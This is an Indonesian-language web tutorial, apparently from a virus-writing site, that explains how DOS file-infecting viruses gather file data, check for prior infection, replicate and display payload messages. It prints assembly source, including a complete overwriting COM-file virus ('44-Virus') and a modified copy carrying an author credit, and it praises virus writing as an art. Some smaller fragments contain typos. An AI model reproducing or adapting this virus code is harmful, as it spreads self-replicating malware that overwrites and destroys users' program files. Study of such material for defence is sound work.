&lt;p align=&quot;justify&quot;&gt;Cara kerja Virus Komputer pada umumnya adalah 
menyebarkan dirinya dengan cara antara lain menularkan file-file 
executable atau file-file yang bisa dijalankan langsung dari DOS Command
 line . Untuk memperjelas mekanisme penyebaran di ilustrasikan pada 
gambar dibawah ini :&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;img src=&quot;http://indovirus.8m.com/IMAGES/wpe1.jpg&quot; alt=&quot;&quot; border=&quot;0&quot; height=&quot;239&quot; width=&quot;264&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;
&lt;p align=&quot;center&quot;&gt;Gambar 4.1. Mekanisme Penularan&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Sudah jadi sifat virus jika dia dijalankan, maka ia 
menulari program aplikasi yang lain, yang di maksud menulari adalah 
menyalin dirinya atau program virus tersebut ke program aplikasi 
lainnya, jika dalm hal ini yang tertular adalah program Aplikasi 1, maka
 apabila program aplikasi 1 tersebut dijalankan, maka program aplikasi 1
 yang sudah serinfeksi virus itu akan menularkan virus pada program 
aplikasi yang ke 2 , maka baik program aplikasi 1 maupun 2, sudah 
merupakan program pemikul bagi virus itu sendiri, yang akan menularkan 
seluruh program aplikasi yang ada.&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Agar bisa bertindak sebagai virus komputer, sebuah 
program harus mempunyai 5 buah kemampuan yang merupakan prinsip dari 
virus komputer. Kelima kemampuan itu adalah :&lt;/p&gt;
&lt;ol&gt;&lt;li&gt;
&lt;p align=&quot;justify&quot;&gt;Kemampuan mendapatkan informasi&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p align=&quot;justify&quot;&gt;Kemampuan memeriksa program&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p align=&quot;justify&quot;&gt;Kemampuan menggandakan diri / menularkan&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p align=&quot;justify&quot;&gt;Kemampuan mengadakan manipulasi&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p align=&quot;justify&quot;&gt;Kemampuan menyembunyikan diri sendiri&lt;/p&gt;
&lt;/li&gt;&lt;/ol&gt;
&lt;p align=&quot;justify&quot;&gt;Satu persatu kemampuan itu akan dijelaskan pada subbab selanjutnya&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;
&lt;p align=&quot;justify&quot;&gt;4. 1.1. Kemampuan mendapatkan Informasi&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Pada Virus Komputer kemampuan untuk mendapatkan 
informasi sangat penting, terutama informasi mengenai file yang akan 
diinfeksi, Virus Komputer biasa nya tidak menulari 1 program saja, tapi 
sekumpulan program, contohnya File-file EXE, file-file COM, atau 
kedua-duanya, virus harus mendapatkan informasi tentang file tersebut 
pada directory, hal-hal mengenai informasi pada file yang perlu 
diketahui antara lain :&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;1. Apakah Extensi File tersebut ( COM,EXE, BAT)&lt;br&gt;
2. Apa Atribut file ( Hidden, Readonly, Archive)&lt;br&gt;
3. Besar File Yang akan Di infeksi&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Informasi tersebut sangat bermanfaat bagi virus, 
dimana informasi mengenai Extension file berguna untuk virus yang 
menyerang file-file tertentu contohnya virus yang menyerang file EXE, 
virus tersebut harus mencari file-file EXE yang akan ditulari.&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Informasi attribut berguna untuk memberikan pilihan 
pada virus apakah dapat menyerang file dengan attribut Readonly, Hidden 
ataukan virus harus mengeset attribut file-file tersebut menjadi Normal,
 sehingga virus dapat menulari.&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Informasi tentang ukuran file berguna untuk operasi matematis yang akan menghitung berapa besar file yang sudah tertular, dimana&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;/em&gt;&lt;/p&gt;&lt;em&gt;
&lt;p align=&quot;justify&quot;&gt;Besar_file_terinfeksi = file_asli + Virus_size&lt;/p&gt;
&lt;/em&gt;&lt;p&gt;&lt;em&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Fungsi ini terutama dipakai oleh virus Non 
OverWriting. Dibawah ini cuplikan metode virus untuk mendapatkan 
informasi tentang File :&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;
&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;Start : mov dx,offset File_to_infect ; cari seluruh file Mov ah,4Eh&lt;br&gt;
Mov cx, 3 ; Attribut File&amp;nbsp;&amp;nbsp;&amp;nbsp; ; cari host file&lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;———&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;int 21h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Dos Intrupt&lt;br&gt;
cmp ax,12h&amp;nbsp; ; Ada file lagi&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;je exit&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; kalau tidak ada exit&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;———&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;file_to_infect db “*.COM” ; File yang akan diinfeksi&lt;br&gt;
ends start&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; akhir kode Virus&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-family: Courier New;&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;
&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;
&lt;p align=&quot;center&quot;&gt;Listing 4.1. Search First File&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Dimana Dx menuju ke alamat yang berisi nama file yang akan di infeksi, sedangkan disini di gunakan DOS &lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;em&gt;Interupt&lt;/em&gt; 21H&lt;/span&gt; dengan &lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;em&gt;Service &lt;/em&gt;ah, 4EH&lt;/span&gt; yang berguna untuk mencari file pertama yang cocok dengan DX ( &lt;em&gt;Find First Matching File&lt;/em&gt;),
 dan mendapat kan informasi tentang file yang berada di dalam directory,
 biasanya fungsi 4Eh ini selalu berpasangan dengan 4Fh, yaitu fungsi 
untuk mencari file berikutnya yang cocok ( &lt;em&gt;Find Next Maching File&lt;/em&gt;), sedangkan nilai CX,3 digunakan untuk mengecek attribut dari file, apakah &lt;em&gt;Hidden, ReadOnly&lt;/em&gt;, virus dapt mengeset kembali attribut file menjadi normal, sehingga virus dapat menginfeksi file tersebut.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;
&lt;p align=&quot;justify&quot;&gt;4. 1. 2. Kemampuan Untuk Memeriksa Program&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Kemampuan untuk memeriksa program sangat penting bagi
 Virus Komputer , karena untuk mengetahui apakah file target sudah 
tertular atau belum, ini sangat penting karena virus tidak akan 
menularkan dirinya berkali-kali pada file yang sama, selain untuk 
mempercepat proses penularan juga untuk menjaga agar file korban tidak 
rusak, karena apabila penularan dilakukan berulang-ulang pada file yang 
sama, CRC dari file tersebut akan kacau dan menyebabkan file yang 
tertular tidak jalan, biasaanya file rusak tersebut akan mengeluarkan 
pesan &lt;em&gt;Divide Over Flow, atau Error in Exe File,&lt;/em&gt; selain itu file
 yang berkali-kali diifeksi akan bertambah besar, dan akan mencurigakan 
pemakai komputer. Seperti digambarkan dalam flowchart berikut ini :&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;img src=&quot;http://indovirus.8m.com/IMAGES/wpe2.jpg&quot; alt=&quot;&quot; border=&quot;0&quot; height=&quot;664&quot; width=&quot;372&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;
&lt;p align=&quot;center&quot;&gt;Gambar 4.2. Memeriksa Program&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;
&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;Berikut ini contoh listing dari kemampuan untuk memeriksa file&lt;/p&gt;
&lt;blockquote&gt;
&lt;blockquote&gt;&lt;p&gt;&lt;span style=&quot;font-family: Arial; font-size: x-small;&quot;&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;Mov ah,     3fh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Baca file&lt;br&gt;
Mov cx, 3&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; baca 3 byte&lt;br&gt;
Mov dx,3_byte&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; simpan pada buffer&lt;br&gt;
Add dx,si&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Nama file&lt;br&gt;
Int 21h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Dos     intrupt&lt;br&gt;
Cmp a,3&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Cek 3     byte tadi&lt;br&gt;
Jnz cari_lagi&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Jika sudah tertular exit&lt;br&gt;
Jmp Infect&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; kalau belum ,     infect_file&lt;br&gt;
3_byte equ $&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;data 3 byte pertama dari file     asli&lt;br&gt;
&lt;/span&gt; &lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt; &lt;/span&gt; &lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;;yang     belum tertular&lt;br&gt;
infect_file :&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; bagian penginfeksian&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;———— ; rutin infeksi&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;int 20h ; Dos Exit function&lt;br&gt;
nop ; No Operation&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt; &lt;/span&gt;&lt;/p&gt;&lt;/blockquote&gt;
&lt;p&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt; &lt;/span&gt;&lt;/p&gt;&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;
&lt;p align=&quot;center&quot;&gt;Listing 4.2 . Periksa File&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Pada rutin diatas dapat dilihat bagai mana Virus 
Komputer memeriksa file korbannya, untuk memberikan identitas file mana 
yang sudah terinfeksi maupun yang belum, karena dengan memeriksa file 
korban, umumnya 3 byte pertama yang menandakan file tersebut sudah 
tertular / belum, 3 byte pertama tersebut umumnya intruksi &lt;em&gt;JMP : offset&lt;/em&gt; (Untuk file COM) , kode &lt;em&gt;‘MZ’&lt;/em&gt; pada header file EXE dan PE untuk File Aplikasi Windows&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Rutin ini sangat penting untuk menghindari penularan 
berkali-kali pada file korban, juga untuk menpercepat penularan. Rutin 
ini dipakai oleh 90 % virus komputer untuk menularkan diri.&lt;strong&gt;&lt;br&gt;
&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;strong&gt;4. 1. 3. Kemampuan untuk menggandakan diri / Replicating&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;kemampuan ini merupakan inti utama dari Virus 
Komputer , karena virus komputer memang diprogram untuk menularkan, dan 
memperbanyak dirinya. Tugas dari rutin replicating ini adalah 
menyebarkan virus keseluruh system yang ditularinya, tugas dari rutin 
ini sangat berat karena rutin tersebut harus mampu menyebarkan virus 
dengan cepat dan tidak diketahui oleh pemakai komputer, selain itu rutin
 replicator harus dapat menjaga agar file yang ditularinnya tidak rusak (
 Rutin untuk Virus Appending / NonOverwriting ), dan dapat berjalan 
sebagaimana mestinnya.&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Cara kerja rutin replicator pada file COM lebih 
sederhana dari file EXE, karena struktur program EXE yang tidak terbatas
 besarnya yaitu ( sebesar memory di komputer ), sedangkan file COM hanya
 dibatasi sampai 64 Kb ( Base memory ). Rutin replikator pada file COM 
akan menditeksi dan mengcopy byte pertama dari file yang akan 
ditularinya, kedalam suatu daerah di memory, rutin tersebut dipindahkan 
kedalam daerah lain dalam file.&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;img src=&quot;http://indovirus.8m.com/IMAGES/wpe3.jpg&quot; alt=&quot;&quot; border=&quot;0&quot; height=&quot;40&quot; width=&quot;347&quot;&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;File bersih&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; program Virus&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Pada diagram diatas P1 adalah bagian pertama dari 
file, P2 adalah bagian kedua dari file korban. P1 harus sama besar 
dengan V1 (rutin virus) , rutin virus akan menyimpan P1 dan mengcopynya 
pada bagian akhir dari file.&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;img src=&quot;http://indovirus.8m.com/IMAGES/wpe5.jpg&quot; alt=&quot;&quot; border=&quot;0&quot; height=&quot;40&quot; width=&quot;222&quot;&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Setelah itu virus akan mengcopykan bagian pertama 
dari dirinya (V1) ke bagian awal file korban. Dimana V1 berisi instruksi
 JMP:V2, yaitu instruksi untuk memanggil badan Virus yang ada di 
belakang file korban.&lt;img src=&quot;http://indovirus.8m.com/IMAGES/wpe6.jpg&quot; alt=&quot;&quot; border=&quot;0&quot; height=&quot;40&quot; width=&quot;213&quot;&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Kemudian virus akan mengcopykan bagian kedunya (V2) 
yang merupakan badan virus ke akhir file yang ditulari, V2 ini biasanya 
berisi rutin-rutin lain seperti rutin untuk pengaman, rutin untuk 
melakukan aksi tertentu dan lain-lain. Rutin tersebut dapat dilihat 
dibawah ini :&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;img src=&quot;http://indovirus.8m.com/IMAGES/wpe7.jpg&quot; alt=&quot;&quot; border=&quot;0&quot; height=&quot;40&quot; width=&quot;299&quot;&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Dalam program dapat diambil contoh 44-Virus.Com , 
yang merupakan virus sepanjang 44 byte, dengan cara kerja Overwriting 
file Com yang ada dalam suatu directory sepanjang badan Virus itu 
sendiri yaitu 44 Byte, virus ini masih sangat sederhana dan belum 
mempunyai rutin-rutin pengaman, maupun kemampuan untuk memeriksa 
program, ataupun rutin untuk aksi-aksi tertentu , dalam contoh dibawah 
ini virus hanya mempunyai kemampuan untuk menulari file Com.&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Namun demikian dapat kita lihat bagaimana virus akan berkembang dengan cara menggandakan dirinya dalam program Com.&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Berikut ini listing dari 44-Virus.Asm :&lt;/p&gt;
&lt;hr&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;virus segment&lt;br&gt;
org 100h ; file COM&lt;br&gt;
assume cs:virus&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;len equ offset last-100h ;Panjang virus = Akhir program – awal program&lt;br&gt;
start : mov ah,04eh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Cari file dengan kategori file COM&lt;br&gt;
xor cx,cx&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; cx 0, = hanya file dengan atrribut Normal&lt;br&gt;
lea dx,com_mask&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Nama file COM masukan ke register DX&lt;br&gt;
int 21h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Dos Intrupt&lt;br&gt;
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis&lt;br&gt;
mov dx,9eh&lt;br&gt;
Int 21h&lt;br&gt;
Infect : mov cx,len&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; cx diisi panjang badan virus&lt;br&gt;
lea dx,start&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Masukan header Virus &lt;em&gt;“V1″&lt;/em&gt; pada DX&lt;br&gt;
Mov ah,40h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Tulis badan virus dalam file korban&lt;br&gt;
Int 21h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Dos Intrupt&lt;br&gt;
Next : mov ah,3eh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Tutup file korban&lt;br&gt;
int 21h&lt;br&gt;
mov ah,4fh&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Cari file korban lagi&lt;br&gt;
int 21h&lt;br&gt;
jnb open_file ; Apa sudah semua file Com ? kalau belum jmp ke Open_file&lt;br&gt;
&lt;/span&gt; &lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;; Kalau sudah semua terinfeksi Exit&lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;com_mask: db “*.COM”,0 ; File dengan ekstensi Com&lt;br&gt;
last : db 090h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Akhir badan virus &lt;em&gt;“V2″&lt;br&gt;
&lt;/em&gt;virus ends&lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;end start&lt;/span&gt;&lt;/p&gt;
&lt;hr&gt;&lt;strong&gt;&lt;span style=&quot;font-size: small;&quot;&gt;
&lt;p align=&quot;center&quot;&gt;Listing 4.3. Replicating / Penggandaan&lt;/p&gt;
&lt;/span&gt;&lt;/strong&gt;&lt;p&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;strong&gt;4. 1. 4. Kemampuan Mengadakan Manipulasi&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Kemampuan untuk mengadakan manipulasi sangat penting 
dilakukan oleh virus, karena bagian ini sebetulnya yang membuat virus 
komputer menarik, dan mempunyai seni dalam pembuatannya. Bagian 
manipulasi atau rutin manipulasi ini banyak macamnya, dan fungsinya, 
suatu virus dapat mempunyai salah satu diantara rutin-rutin manipulasi 
ini maupun gabungan antara rutin-rutin manipulasi tersebut. yang pasti, 
makin banyak rutin manipulasi yang dipakai oleh virus, maka akan makin 
besar ukuran virus yang dibuat. Diantara rutin-rutin manipulasi yang 
ada, yang sering digunakan adalah :&lt;/p&gt;
&lt;ol&gt;&lt;li&gt;
&lt;p align=&quot;justify&quot;&gt;Menampilkan tulisan / kata-kata / gambar&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p align=&quot;justify&quot;&gt;Membunyikan port speaker&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p align=&quot;justify&quot;&gt;Time bomb / logic Bomb&lt;/p&gt;
&lt;/li&gt;&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;
&lt;p align=&quot;justify&quot;&gt;4.1.4.1. Menampilkan Tulisan / gambar&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Rutin ini yang paling banyak dipakai oleh pembuat 
Virus Komputer , karena rutin ini selain untuk kepopularitas virus 
maupun pembuatnya, juga akan membuat virusnya mudah dikenal oleh para 
pemakai komputer, selain itu rutin ini membutuhkan suatu kreatifitas 
tinggi dan jiwa seni dari pembuatnya yang akan membuat virus ini akan 
menarik. Listing program dibawah ini akan memberikan contoh pembuatan 
rutin ini.&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;&lt;br&gt;
&lt;/span&gt;&lt;/p&gt;&lt;hr&gt;
&lt;p align=&quot;justify&quot;&gt;virus segment&lt;br&gt;
org 100h&lt;br&gt;
assume cs:virus&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;len equ offset last-100h ; Panjang virus = Akhir program – awal program&lt;br&gt;
start : jmp mulai&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;
msg db ‘ Modification of 44 Virus ‘,13,10&lt;br&gt;
db ‘ © 2000,iwing[indovirus] ’,13,10&lt;br&gt;
db ‘ – For Educational Only -$’,13,10&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;
mulai : mov ah,09&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Dos service 09h = Cetak String&lt;br&gt;
lea dx,msg&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; dx berisi pesan yang akan dicetak&lt;br&gt;
int 21h ; Dos intrupt&lt;br&gt;
go : mov ah,04eh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Cari file dengan kategori file COM&lt;br&gt;
xor cx,cx&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; cx 0, = hanya file dengan atrribut Normal&lt;br&gt;
lea dx,com_mask&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Nama file COM masukan ke register DX&lt;br&gt;
int 21h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Dos Intrupt&lt;br&gt;
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis&lt;br&gt;
mov dx,9eh&lt;br&gt;
Int 21h&lt;br&gt;
infect : mov cx,len ; cx diisi panjang badan virus&lt;br&gt;
lea dx,start&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Masukan header Virus &lt;em&gt;“V1″&lt;/em&gt; pada DX&lt;br&gt;
mov ah,40h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Tulis badan virus dalam file korban&lt;br&gt;
Int 21h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Dos Intrupt&lt;br&gt;
Next : mov ah,3eh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Tutup file korban&lt;br&gt;
int 21h&lt;br&gt;
mov ah,4fh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Cari file korban lagi&lt;br&gt;
int 21h&lt;br&gt;
jnb open_file&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Apa sudah semua file Com ?,kalau belum jmp ke Open_file&lt;br&gt;
; Kalau sudah semua terinfeksi Exit&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;com_mask: db “*.COM”,0 ; File dengan ekstensi Com&lt;br&gt;
last : int 20h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Akhir badan virus &lt;em&gt;“V2″&lt;/em&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;virus ends&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;end start&lt;/p&gt;

&lt;hr&gt;&lt;strong&gt;&lt;span style=&quot;font-size: small;&quot;&gt; &lt;/span&gt;&lt;/strong&gt;
